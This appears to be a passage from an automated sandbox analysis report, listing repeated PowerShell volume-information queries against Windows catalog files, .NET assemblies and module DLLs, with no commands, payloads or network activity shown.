Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
